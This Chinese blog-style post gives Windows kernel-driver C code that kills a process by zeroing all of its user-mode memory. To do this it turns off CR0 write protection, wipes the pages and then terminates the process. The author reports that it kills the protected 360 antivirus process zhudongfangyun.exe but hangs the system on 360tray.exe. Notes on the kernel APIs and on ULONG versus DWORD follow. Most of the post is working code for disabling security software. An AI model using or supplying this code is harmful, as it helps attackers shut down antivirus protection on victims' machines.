内存填零杀进程
效果:可以杀掉360的傀儡进程zhudongfangyun.exe但杀360tray.exe时会卡死系统,不知道360tray做了如何保护..
.c代码:
PHYSICAL_ADDRESS g_physicalPage;
VOID DestoryProess(ULONG eproc)
{
ULONG ulEndAddress = (ULONG)MmSystemRangeStart;
PHYSICAL_ADDRESS physical_addr;
ULONG ulVirtualAddress;
ULONG AddrTemp;
KIRQL irql;
SYSTEM_BASIC_INFORMATION SysBaseInfo;
NTSTATUS status;
HANDLE ProcessHandle;
dprintf("MmSystemRangeStart:0x%08x\n", ulEndAddress);
//引入全局变量
status = ZwQuerySystemInformation (SystemBasicInformat, &SysBaseInfo, sizeof (SysBaseInfo), 0);
if (!NT_SUCCESS(status))
{
dprintf("ZwQuerySystemInformation error\n");
return ;
}
dprintf("pBasicInfo:0x%08x\n", SysBaseInfo);
__asm mov eax,SysBaseInfo.PhysicalPageSize;
__asm mul SysBaseInfo.NumberOfPhysicalPages;
__asm mov g_physicalPage.HighPart, edx;
__asm mov g_physicalPage.LowPart, eax;
KeAttachProcess((PEPROCESS)eproc);
for (ulVirtualAddress = 0x1000;ulVirtualAddress < ulEndAddress; ulVirtualAddress += 0x1000)
{
physical_addr = MmGetPhysicalAddress((PVOID)ulVirtualAddress);
if (physical_addr.HighPart > g_physicalPage.HighPart)
{
continue;
}
if ((physical_addr.HighPart == g_physicalPage.HighPart)&&(physical_addr.LowPart >= g_physicalPage.LowPart))
{
continue;
}
if ((physical_addr.HighPart | physical_addr.LowPart) ==0)
{
continue;
}
AddrTemp = MmGetVirtualForPhysical(physical_addr);
dprintf("ulVirtualAddress:0x%08x, AddrTemp:0x%08x\n",ulVirtualAddress, AddrTemp);
if (AddrTemp != ulVirtualAddress)
{
continue;
}
dprintf("ready for wpoff\n");
irql = WPOFF();
RtlZeroMemory((PVOID)ulVirtualAddress, 0x1000);
WPON(irql);
}
KeDetachProcess();
status = ObOpenObjectByPointer((PVOID)eproc, 0, NULL, 0, NULL, KernelMode, &ProcessHandle);
if (!NT_SUCCESS(status))
{
return ;
}
ZwTerminateProcess(ProcessHandle, STATUS_SUCCESS);
ZwClose(ProcessHandle);
}
KIRQL WPOFF()
{
KIRQL irql=KeRaiseIrqlToDpcLevel();
UINT64 cr0=__readcr0();
cr0 &= 0xfffffffffffeffff;
__writecr0(cr0);
_disable();
return irql;
}
void WPON(KIRQL irql)
{
UINT64 cr0=__readcr0();
cr0 |= 0x10000;
_enable();
__writecr0(cr0);
KeLowerIrql(irql);
}
.H文件
VOID DestoryProess(ULONG eproc);
typedef enum _SYSTEM_INFORMATION_CLASS
{
SystemBasicInformat
}SYSTEM_INFORMATION_CLASS;
typedef struct _SYSTEM_BASIC_INFORMATION
{
ULONG Unknown;
ULONG MaximumIncrement;
ULONG PhysicalPageSize;
ULONG NumberOfPhysicalPages;
ULONG LowestPhysicalPage;
ULONG HighestPhysicalPage;
ULONG AllocationGranularity;
ULONG LowestUserAddress;
ULONG HighestUserAddress;
ULONG ActiveProcessors;
UCHAR NumberProcessors;
}SYSTEM_BASIC_INFORMATION, * PSYSTEM_BASIC_INFORMATION;
#pragma intrinsic(__readmsr)
#pragma intrinsic(_disable)
#pragma intrinsic(_enable)
KIRQL WPOFF();
void WPON(KIRQL irql);
VOID
KeAttachProcess ( PRKPROCESS Process
);
void KeDetachProcess();
NTSTATUS ObOpenObjectByPointer(
PVOID Object,
ULONG HandleAttributes,
PACCESS_STATE PassedAccessState,
ACCESS_MASK DesiredAccess,
POBJECT_TYPE ObjectType,
KPROCESSOR_MODE AccessMode,
PHANDLE Handle
);
lkd> dd MmSystemRangeStart
805599d8 80000000 7ffeffff 00000000 00000000
805599e8 00000000 00000000 00000000 00000000
805599f8 00000000 00000000 0000000d 00000000
80559a08 00000000 00000000 00000000 00000000
80559a18 00000000 00000000 00000000 00000000
80559a28 00000000 00000000 00000000 00000000
80559a38 00000000 00000000 00000000 00000000
80559a48 00000000 00000000 00000000 00000000
MmSystemRangeStart是内核导出的一个内核常量, 指出了线性地址的起始位置.从上面可以看出起始位置是80000000.如何打印出?
dprintf("MmSystemRangeStart: 0x%x 0x%x\n", \
*(ULONG*)MmSystemRangeStart, *( (ULONG*)MmSystemRangeStart + 1 ) );
所用到的函数解释:
1. PHYSICAL_ADDRESS MmGetPhysicalAddress( _In_ PVOID BaseAddress );
MmGetPhysicalAddress returns the physical address that corresponds to the given virtual address.
其中 PHYSICAL_ADDRESS 在ntdef.h中有定义:
typedef
LARGE_INTEGER
PHYSICAL_ADDRESS, *PPHYSICAL_ADDRESS;
2.
NTSTATUS ObOpenObjectByPointer( _In_ PVOID Object, _In_ ULONG HandleAttributes, _In_opt_ PACCESS_STATE PassedAccessState, _In_ ACCESS_MASK DesiredAccess, _In_opt_ POBJECT_TYPE ObjectType, _In_ KPROCESSOR_MODE AccessMode, _Out_ PHANDLE Handle );
中间一个小插曲,他的代码中为什么都用DWORD类型,而不用ULONG类型?实际上两者是一样一样的.
LONG与DWORD都是WinDef.h中定义的宏
typedef
typedef
两者一模一样.
为何我在很多地方看到同时使用这两个类型???
例1,在MSDN中代码:
例2,在winterdom上的代码:
ulong是偏向于“数值”的概念就是无符号长整形,从0到4294967295。
而DWORD则偏向于这种数据类型所占的字节数为4Bytes,他可以分成高低“字”,等等,通常作为flag